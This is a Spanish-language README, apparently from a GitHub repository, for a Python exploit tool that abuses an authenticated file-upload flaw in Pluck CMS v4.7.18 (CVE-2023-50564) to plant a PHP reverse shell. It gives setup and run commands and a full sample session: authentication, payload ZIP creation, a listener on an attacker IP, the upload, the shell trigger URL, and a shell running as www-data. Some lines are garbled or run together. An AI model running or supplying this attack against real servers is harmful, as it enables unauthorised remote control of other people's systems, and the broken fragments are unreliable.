
Este script explota la función de carga de archivos en Pluck CMS v4.7.18 para cargar un archivo PHP malicioso, permitiendo acceso remoto a través de una reverse shell. Una vez cargado, este backdoor otorga al atacante acceso al servidor con permisos de servidor web, permitiendo acciones adicionales dentro del sistema o la red.
Este script explota una vulnerabilidad de subida arbitraria de archivos autenticada en Pluck CMS v4.7.18 (CVE-2023-50564). Al aprovechar esta vulnerabilidad, un atacante autenticado puede subir un archivo PHP malicioso, permitiendo la ejecución de código arbitrario (en este caso, una reverse shell).
La vulnerabilidad existe en el endpoint /admin.php?action=installmodule, que permite a un usuario autenticado subir un archivo ZIP que contiene archivos arbitrarios. Al subir un archivo PHP malicioso, este exploit establece una reverse shell hacia el atacante.
pip install requestspip install requests-toolbeltEste script también requiere un inicio de sesión válido para la instancia de Pluck CMS, incluyendo la URL y la contraseña del objetivo.
su, sudo -l) y permite al usuario proporcionar entrada manualmente.git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
cd Pluck-CMS-Exploit
pip install requests requests-toolbelt
Ejecute el exploit usando Python:
python3 exploit.py
Shell> para interactuar con el sistema objetivo.Ejemplo:
$ python3 exploit.py
Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
Enter the password for target authentication: password123
Enter your IP (for reverse shell): 10.10.14.5
Enter the port to listen on (for reverse shell): 4444
[*] Authenticating to the target...
[+] Authentication successful.
[*] Generating reverse shell PHP file...
[+] Reverse shell PHP file created successfully as 'shell.php'.
[*] Creating ZIP payload...
[+] ZIP file created as 'payload.zip'.
[*] Starting reverse shell listener on 10.10.14.5:4444 ...
[*] Uploading payload to the target...
[+] Payload uploaded successfully.
[*] Triggering reverse shell at: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
[+] Connection received from ('10.10.10.1', 55678)
Shell> whoami
www-data
Este script está destinado a fines educativos y hacking ético. Solo debe usarse en entornos donde tenga permiso explícito para realizar pruebas. El autor no se responsabiliza por el mal uso de esta herramienta.
Este proyecto está licenciado bajo la Licencia MIT - consulte Licencia MIT para más detalles.
Siéntase libre de bifurcar el repositorio y enviar pull requests. Para cualquier problema o solicitud de función, abra un issue en GitHub.